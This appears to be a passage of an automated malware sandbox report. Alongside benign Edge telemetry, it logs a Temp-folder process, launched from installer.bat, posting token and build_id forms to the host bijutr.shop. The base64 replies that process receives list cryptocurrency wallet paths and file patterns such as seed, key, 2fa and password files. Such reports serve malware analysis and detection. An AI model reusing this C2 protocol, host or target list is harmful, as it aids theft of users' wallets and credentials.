2024-12-27 06:10:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 Data Ascii: ------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------YUAI5X4W47GV3EUS0HDTCont
2024-12-27 06:10:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:54 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50054	20.42.73.30	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:54 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279851726&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11928 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-27 06:10:54 UTC	11928	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 31 30 3a 35 31 2e 37 32 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 65 62 65 36 32 61 34 2d 63 33 33 32 2d 34 36 65 30 2d 62 39 38 33 2d 65 37 66 36 63 37 37 32 38 62 61 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 32 32 36 33 31 33 33 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:10:51.724Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"bebe62a4-c332-46e0-b983-e7f6c7728ba6","epoch":"4222631333"},"app":{"locale
2024-12-27 06:10:54 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=4b59ed61eb1147459094705eb3acfd5a&HASH=4b59&LV=202412&V=4&LU=1735279854610; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:54 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=08a584979fbd4f96b555a356a8aa7218; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:54 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2884 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 27 Dec 2024 06:10:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50053	20.42.73.30	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:54 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279851731&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5220 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-27 06:10:54 UTC	5220	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 31 30 3a 35 31 2e 37 32 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 65 62 65 36 32 61 34 2d 63 33 33 32 2d 34 36 65 30 2d 62 39 38 33 2d 65 37 66 36 63 37 37 32 38 62 61 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 32 32 36 33 31 33 33 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:10:51.728Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"bebe62a4-c332-46e0-b983-e7f6c7728ba6","epoch":"4222631333"},"app":{"locale
2024-12-27 06:10:54 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=a37bc1620a394068ab342d87dde7f991&HASH=a37b&LV=202412&V=4&LU=1735279854654; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:54 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=a117ad6c2f7843d2a60c6a495f33ee81; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:54 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2923 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 27 Dec 2024 06:10:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50055	20.42.73.30	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:55 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279852586&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5418 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1; msnup=
2024-12-27 06:10:55 UTC	5418	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 31 30 3a 35 32 2e 35 38 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 65 62 65 36 32 61 34 2d 63 33 33 32 2d 34 36 65 30 2d 62 39 38 33 2d 65 37 66 36 63 37 37 32 38 62 61 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 32 32 36 33 31 33 33 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:10:52.585Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"bebe62a4-c332-46e0-b983-e7f6c7728ba6","epoch":"4222631333"},"app":{"locale
2024-12-27 06:10:55 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=3f51c3a84a12449ab660ddc500ec93a8&HASH=3f51&LV=202412&V=4&LU=1735279855552; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:55 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=dfbb50e7f2f2433a93be5232e8e4eb9f; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:55 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2966 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 27 Dec 2024 06:10:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50056	20.42.73.30	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:55 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279852742&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9877 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1; msnup=
2024-12-27 06:10:55 UTC	9877	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 31 30 3a 35 32 2e 37 34 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 65 62 65 36 32 61 34 2d 63 33 33 32 2d 34 36 65 30 2d 62 39 38 33 2d 65 37 66 36 63 37 37 32 38 62 61 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 32 32 36 33 31 33 33 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T06:10:52.741Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"bebe62a4-c332-46e0-b983-e7f6c7728ba6","epoch":"4222631333"},"app":{"loc
2024-12-27 06:10:56 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=f57e633e734e49d3a7e1935ab027b04d&HASH=f57e&LV=202412&V=4&LU=1735279855836; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:55 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=2c4090cb58b44299a52ed2bdd27e7ab5; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:55 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3094 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 27 Dec 2024 06:10:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50060	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:55 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----0R1DBSRQQ9RQIE37Y5F3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:55 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 30 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 30 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 0d 0a 43 6f 6e 74 Data Ascii: ------0R1DBSRQQ9RQIE37Y5F3Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------0R1DBSRQQ9RQIE37Y5F3Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------0R1DBSRQQ9RQIE37Y5F3Cont
2024-12-27 06:10:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:56 UTC	2208	IN	Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50069	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:58 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----NYCBAAI58YMYM7QQ9ZM7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 7009 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:58 UTC	7009	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 42 41 41 49 35 38 59 4d 59 4d 37 51 51 39 5a 4d 37 0d 0a 43 6f 6e 74 Data Ascii: ------NYCBAAI58YMYM7QQ9ZM7Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------NYCBAAI58YMYM7QQ9ZM7Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------NYCBAAI58YMYM7QQ9ZM7Cont
2024-12-27 06:10:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50077	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:11:01 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDJEU3WBSJM7QI5FCJE3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 6985 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:11:01 UTC	6985	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 4a 45 55 33 57 42 53 4a 4d 37 51 49 35 46 43 4a 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 4a 45 55 33 57 42 53 4a 4d 37 51 49 35 46 43 4a 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 4a 45 55 33 57 42 53 4a 4d 37 51 49 35 46 43 4a 45 33 0d 0a 43 6f 6e 74 Data Ascii: ------HDJEU3WBSJM7QI5FCJE3Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------HDJEU3WBSJM7QI5FCJE3Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------HDJEU3WBSJM7QI5FCJE3Cont
2024-12-27 06:11:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:11:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Target ID:	0
Start time:	01:09:00
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\installer.bat" "
Imagebase:	0x7ff6247e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:09:00
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
